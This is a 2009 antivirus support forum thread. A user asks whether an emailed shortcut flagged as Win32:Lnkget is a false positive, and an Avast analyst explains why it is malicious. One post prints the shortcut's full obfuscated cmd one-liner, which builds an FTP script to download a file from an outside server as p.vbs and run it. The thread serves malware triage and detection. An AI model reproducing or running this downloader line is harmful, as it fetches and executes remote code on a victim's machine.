Author Topic: Win32:Lnkget or FP?  (Read 10734 times)

0 Members and 1 Guest are viewing this topic.

Offline dude2

  • Jr. Member
  • **
  • Posts: 68
Win32:Lnkget or FP?
« on: September 07, 2009, 10:06:34 AM »
I received an email and reported by Avast Home as infected by Win32:Lnkget. Uploaded this email to Virus Total(http://www.virustotal.com/) for scanning and analysis. The result can be found here. http://www.virustotal.com/analisis/de3b90893777ef57a4f5710465e54af0524b5c0c6938d97a16885bf7edb5b542-1252306731

There are 9 out of 41 Antivirus software products reporting this email containing malware link. Other 32 consider this email clean. How to tell if it is not false positive?

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #1 on: September 07, 2009, 11:12:39 AM »
Hi,
you can send this file to us using avast! warning dialog, as shown in picture below, and we will analyze that. If it is false positive we will fix it.

Milos

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #2 on: September 07, 2009, 12:58:45 PM »
Hi,
it looks, that you email contains some attachement with a shortcut (file with .lnk extension), that looks like picture below (right click -> Properities). See part the called "Target". If it looks similar it's not false positive.

Milos

Offline dude2

  • Jr. Member
  • **
  • Posts: 68
Re: Win32:Lnkget or FP?
« Reply #3 on: September 07, 2009, 01:42:08 PM »
Hi,
it looks, that you email contains some attachement with a shortcut (file with .lnk extension), that looks like picture below (right click -> Properities). See part the called "Target". If it looks similar it's not false positive.

Milos
Hi, Milos,

There are two identical lnk shortcuts (but with different lnk names) attached in the suspected email. For your reference, I hereby copied their "Target" settings:

lnk1: %ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m&echo start p.vbs>>m&ren m t.bat&t.bat&

lnk2: %ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m&echo start p.vbs>>m&ren m t.bat&t.bat&

Are these scripts supposed to download stuff and even execute some on my system? But, my question is how to tell if these scripts will do real damage to my system, such as deleting system files, altering Windows registry, or openning a back door as a Trojan. Could my XP system be that vulnerable as to be totally controlled by such scripts? Above all, why did the other 32 Antivirus software products from VirusTotal check it and let it pass?

Dan

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #4 on: September 07, 2009, 03:24:53 PM »
Hi dude2,
script in the "Target" creates script for ftp (address ftp.g03z.com) with filled in username and password and tries to download file "p" and store them as "p.vbs" in %windir% (from the shortcut properities "Start in") and then run the "p.vbs". But the file "p" doesn't exist this time on then ftp server, so "p.vbs" is empty and does nothing (no real damage to your system).

Why other antivirus software products from VirusTotal check it and let it pass? I don't know, maybe they didn't analyze this file.


Milos

Offline dude2

  • Jr. Member
  • **
  • Posts: 68
Re: Win32:Lnkget or FP?
« Reply #5 on: September 07, 2009, 05:41:47 PM »
Milos, thank you for your thorough investigation on this issue.

But, here comes the hazy part of this odd problem. If a friend sends me an email with a lnk which can lead me to his well-arranged script procedure, and if I click on that lnk it starts the scripts automatically as intended and simply DOES NO HARM to the Windows system. In that case, will Avast still detect that email as suspected of Win32:Lnkget infection because of some automated scripts getting executed?

Or, does there need to be any harmful signatures or patterns of the activities of the executed scripts which match Avast iAVS DB and therefore trigger the alarm? For example, the suspected scripts are manipulating the system or put users in the harm way.

If you said that the file "p" doesn't exist at this time on that ftp server and therefore this script can do no harm to my system, and if this email message is still detected by Avast! as infected as of today, then I wonder whether it is detected simply because of embedded scripts in lnk reference. If it is the case, to me it is more like a "access control related issue" and users need to wisely set their system so that they do not easily trigger something unexpectedly. Could that be the reason that the other antivirus software products can not conclude this email infected simply from finding embedded scripts, but instead needing more evidence on suspected activities?

Thank you,

Dan
« Last Edit: September 07, 2009, 05:43:53 PM by dude2 »

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #6 on: September 07, 2009, 06:06:57 PM »
Quote
But, here comes the hazy part of this odd problem. If a friend sends me an email with a lnk which can lead me to his well-arranged script procedure, and if I click on that lnk it starts the scripts automatically as intended and simply DOES NO HARM to the Windows system. In that case, will Avast still detect that email as suspected of Win32:Lnkget infection because of some automated scripts getting executed?
Yes avast! will still detect that email -- when avast! scan that .lnk file it doesn't know if the file on ftp server exists. If you don't disable avast! it doesn't allow you to run this script.

Quote
Or, does there need to be any harmful signatures or patterns of the activities of the executed scripts which match Avast iAVS DB and therefore trigger the alarm? For example, the suspected scripts are manipulating the system or put users in the harm way.
Yes.

Quote
If you said that the file "p" doesn't exist at this time on that ftp server and therefore this script can do no harm to my system, and if this email message is still detected by Avast! as infected as of today, then I wonder whether it is detected simply because of embedded scripts in lnk reference. If it is the case, to me it is more like a "access control related issue" and users need to wisely set their system so that they do not easily trigger something unexpectedly. Could that be the reason that the other antivirus software products can not conclude this email infected simply from finding embedded scripts, but instead needing more evidence on suspected activities?
I think, that it will be hard work to analyze some script in AV engine and login to some ftp server using data gathered from analyzed scipt and check if file exist, download it and again check if it's harmful (you can see here posibility of long time processing).

If you receive some suspected email or program which you don't trust you can run it in some virtual machine and see if it is doing some bad things -- you can than return to previous state before infection.

Milos

Offline dude2

  • Jr. Member
  • **
  • Posts: 68
Re: Win32:Lnkget or FP?
« Reply #7 on: September 08, 2009, 06:47:50 AM »
Yes, the lnks' targets contain scripts, but I did not see the suspected scripts are manipulating the system or put users in the harm way, simply because the file "p" doesn't even exist on the remote FTP server during the test. If some of those VirusTotal-listed 32 antivirus software products that DID NOT SHOW POSITIVE come with the file emulation or some heuristic analysis capability and they do not find those scripts doing any harm other than trying to connect to a remote site and to download and execut unharmful stuff, then are we safe to say it is a false positive or maybe a little overcautious? Or, do you think the test results from those 32 out of 41 AV products are false negative?

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #8 on: September 08, 2009, 10:22:02 AM »
If you look on the script, you can see, that there are is no direct ftp address (it is substituted during runtime) some commands are substituted same way, so what is the reason to do that? It is considered as malware practices to hide the real behavior, so others AV are false negative.

Offline dude2

  • Jr. Member
  • **
  • Posts: 68
Re: Win32:Lnkget or FP?
« Reply #9 on: September 08, 2009, 06:15:29 PM »
Are those scripts at most being considered as mischievous? Or, do they really manipulate the system to the extent of degrading system performance or security or put users in the harm's way? Once that is clarified, I may concur more on the false positive or false negative conclusion.

If you look on the script, you can see, that there are is no direct ftp address (it is substituted during runtime) some commands are substituted same way, so what is the reason to do that? It is considered as malware practices to hide the real behavior, so others AV are false negative.
I do not know the reason of using substituted ftp address during the runtime. But, could a legitimate script or program using the similar technique? Doesn't Windows system itself take ftp address as an argument in its command line or FTP app environment? Again it is only my immature opinion, can we judge a script simply by its programming techniques?

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #10 on: September 09, 2009, 09:17:54 AM »
Quote
Are those scripts at most being considered as mischievous?
a) If you think the script which are downloaded from ftp -- I don't remember. But the script is downloaded from strange url g03z.com (you can see owner and other properities: http://whois.domaintools.com/g03z.com or picture below).

b) If you think the script from .lnk -- yes.

In case of this .lnk file, there is no reason to obfuscate the script. so It can be considered as malicious plus WHOIS informations.

Legitimate script has no reason to obfuscate the ftp address.

Offline dude2

  • Jr. Member
  • **
  • Posts: 68
Re: Win32:Lnkget or FP?
« Reply #11 on: September 10, 2009, 01:24:26 AM »
There is no argue that the site administrator's identity does look suspicious based on the registration info on whois, and it is just as suspicious to have scripts embedded in lnk, especially doing ftp and downloading stuff. But, what trait makes it more than just suspicious or somewhat obfuscating but honored enough to join the Avast!iAVS/VPS still buffles me. I think a so-called malware needs to manipulate the system to the extent of degrading system performance or security or to put users in the harm's way.

Based on http://www.avast.com/eng/vps-content-2009.html, Avast! honored Win32:Lnkget as a Trojan in its VPS. But, base on http://www.viruslist.com/en/virusesdescribed and http://www.viruslist.com/en/virusesdescribed?chapter=152540521, a Trojan, especially a Trojan Downloader, needs to download and install new malware or adware on the victim machine. Meanwhile, a Trojan Dropper is composed of at least a dangerous payload and a harmless hoax, such as jokes, games, graphics and so forth. What if the downloaded stuff can not be detected as malware, adware, or dangerous payload?
« Last Edit: September 10, 2009, 02:06:09 AM by dude2 »

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #12 on: September 10, 2009, 10:06:11 AM »
It depends on case-by-case.

Offline dude2

  • Jr. Member
  • **
  • Posts: 68
Re: Win32:Lnkget or FP?
« Reply #13 on: September 10, 2009, 11:15:29 AM »
It depends on case-by-case.
Can you elaborate on that? Be more specific on my case, please.
« Last Edit: September 10, 2009, 11:18:05 AM by dude2 »

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #14 on: September 10, 2009, 01:49:36 PM »
It depends on case-by-case.
Can you elaborate on that? Be more specific on my case, please.
The file on ftp server doesn't exist, so I can't be more specific.